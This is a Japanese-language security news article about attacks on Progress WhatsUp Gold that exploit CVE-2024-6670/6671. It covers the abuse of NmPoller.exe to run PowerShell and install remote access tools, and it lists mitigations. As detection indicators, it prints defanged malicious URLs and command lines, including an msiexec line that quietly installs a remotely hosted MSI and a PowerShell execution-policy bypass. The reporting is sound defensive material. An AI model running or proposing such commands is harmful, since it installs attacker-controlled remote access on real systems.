Progress WhatsUp Gold を狙う RCE 攻撃:脆弱性 CVE-2024-6670/6671 を悪用して展開

WhatsUp Gold Under Attack: New RCE Vulnerabilities Exploited

2024/09/12 SecurityOnline — Progress WhatsUp Gold を標的とする、リモート・コード実行 (RCE:remote code execution) 攻撃が、Trend Micro により発見された。同社の WhatsUp Gold に存在する、脆弱性 CVE-2024-6670/CVE-2024-6671 を悪用することで、一連の攻撃が展開されている。攻撃が観測された 2024年8月30日より前の 8月16日に、これらの脆弱性に対してパッチが適用されているが、PoC エクスプロイト・コードの公開により、急速な攻撃の波が引き起こされている。それが浮き彫りにするのは、ユーザー組織におけるパッチ管理により、常に最新の状態に保つことの重要性である。


これらの脆弱性の CVSS スコアは 9.8 であり、深刻度の高さが示されている。これらの脆弱性の悪用に成功した攻撃者は認証をバイパスし、Active Monitor PowerShell スクリプト機能を介したアプリケーションの制御を可能にするという。

WhatsUp Gold の正当なプロセスである NmPoller.exe を介して、悪意の PowerShell スクリプトを実行する攻撃者は、リモート・アクセス・ツールをダウンロードして実行し、標的システム上で永続性を確保する。さらに、信頼されたプロセスによりスクリプトが実行されるため、従来の検出方法を回避することが可能となっている。この悪意のスクリプトは、以下のような各種のリモート・アクセス・ツールをダウンロードするために使用されている:

  • Atera Agent
  • Radmin
  • SimpleHelp Remote Access
  • Splashtop Remote

攻撃者は “msiexec.exe” を用いて、悪意の URL からリモート・アクセス・ツールをダウンロードし、これらのツールをインストールする。そして、これらのツールを足がかりに、侵害したシステム上で長期にわたる持続性の確立を試みる。

この攻撃手法では NmPoller.exe が用いられ、個別の PowerShell プロセスを起動することなく PowerShell スクリプトを実行し、検出を困難にしていた。しかし、特定の動作から、侵害の可能性が示される場合がある:

  • NmPoller.exe に関連する、異常なプロセス生成イベント
  • 不審な URL からのダウンロード (例:
    • hxxp://185.123.100[.]160/access/Remote Access-windows64-offline.exe
    • hxxps://fedko[.]org/wp-includes/ID3/setup.msi

セキュリティ・チームは、以下のようなプロセスの生成を監視する必要がある:

  • "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -file c:\programdata\a.ps1
  • "C:\Windows\system32\msiexec.exe" /i hxxp://45.227.255[.]216:29742/setup.msi /Qn

Trend Micro が推奨するのは、これらの攻撃から保護する手段として、以下の手順を実施することである:

  1. 最新パッチの適用:脆弱性に対するパッチが、すでにリリースされているため、すべての WhatsUp Gold インスタンスが、最新バージョンに更新されていることを確認する。
  2. アクセスの制限:WhatsUp Gold の管理コンソールと API エンドポイントを厳格なアクセス制御下に置き、オープンなインターネットにソフトウェアが露出しないようにする。
  3. 不審なアクティビティの監視:プロセス作成イベントを継続的に監視し、特に NmPoller.exe と PowerShell スクリプトが関与するものを監視する。
  4. 強力なパスワードの使用:パッチを適用しても、admin などの脆弱なパスワードを使用すると、システムが不正アクセスにさらされる可能性がある。

Progress WhatsUp Gold の脆弱性 CVE-2024-6670/CVE-2024-6671 ですが、第一報は 2024/08/22 の「Progress WhatsUp Gold の脆弱性 CVE-2024-6670/6671 が FIX:ただちにアップデートを!」であり、第二報は 2024/09/01 の「Progress WhatsUp Gold の脆弱性 CVE-2024-6670:PoC エクスプロイトが提供」となっています。現時点では、攻撃者の属性や被害の状況が明らかにされていませんが、PoC のリリース後の積極的な攻撃にいたる可能性があるため、特に注意が必要です。よろしければ、Progress で検索も、ご参照ください。